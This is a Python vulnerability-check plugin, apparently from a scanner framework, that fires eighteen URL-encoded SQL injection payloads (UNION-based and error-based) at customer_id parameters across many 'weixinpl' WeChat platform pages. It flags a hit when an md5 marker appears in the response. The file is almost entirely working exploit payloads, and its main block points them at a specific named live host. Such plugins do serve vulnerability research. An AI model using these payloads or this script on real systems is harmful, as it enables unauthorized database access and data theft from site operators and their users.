#coding:utf-8
from lib.curl import *
#-*- encoding:utf-8 -*-
#__author__ = '1c3z'
#ref http://wooyun.org/bugs/wooyun-2015-0109221


def assign(service, arg):
    if service == "weixinpl":
        return True, arg


def audit(arg):
    import urllib2
    payloads = ['weixinpl/huodong/show_huodong.php?customer_id=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2Cmd5%280x22%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20',\
    'weixinpl/miaosha/show_miaosha.php?customer_id=-1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2Cmd5%280x22%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20',\
'weixinpl/order_car/show_car.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/wish/show_wish.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/online/show_online.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/xitie_new/show_xitie.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/feedback/feedback.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/recruit/show_recruit.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/insurance/show_insurance.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/guahao/show_guahao.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/car_tips/index.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/guide/show_guide.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/sign/show_sign.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/new_dingcan/catering.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/order_baoxian/show_order.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/zhengwu/zhengwu.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/training/training.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29',\
'weixinpl/booth/show_booth.php?customer_id=-1%20or%20%28SELECT%203442%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x22%29%2C%28SELECT%20%28ELT%283442%3D3442%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2a2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29']
    for payload in payloads:
        url = arg + payload
        code, head,res, errcode, _ = curl.curl2(url,payload)
        if 'b15835f133ff2e27c7cb28117bfae8f4' in res:
            security_hole(url)
                        
if __name__ == '__main__':
    from dummy import *
    audit(assign('weixinpl', 'http://admin.cd8090tg.com/')[1])